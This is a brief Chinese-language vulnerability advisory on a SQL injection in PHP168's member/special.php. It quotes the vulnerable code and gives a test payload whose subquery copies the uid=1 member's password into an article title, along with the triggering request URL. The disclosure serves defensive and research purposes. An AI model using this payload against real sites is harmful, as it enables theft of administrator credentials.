漏洞描述:
PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能模块可以自由安装与删除,个人用户完全免费使用。 在文件member/ special.php中: elseif($job=="show_iframe"){ //第126行 $rsdb=$db->get_one("SELECT * FROM {$pre}special WHERE uid='$lfjuid' AND id='$id'"); …… if($act=="del"&&$aid) //第155行 { $detail=explode(",",$rsdb[aids]); foreach( $detail AS $key=>$value){ if($value==$aid){ unset($detail[$key]); } } $rsdb[aids]=$string=implode(",",$detail); $db->query("UPDATE {$pre}special SET aids='$string' WHERE uid='$lfjuid' AND id='$id'"); $rsdb[aids]直接从数据库中读出,没有经过任何验证放入sql语句导致注入漏洞的产生
测试方法:第一:创建文集,本地提交。Aid= a',title=(select password from p8_members where uid=1) where fid=2# 第二:http://ssvdb.com/member/special.php?job=show_iframe&act=del&id=1&aid=1
0 条评论。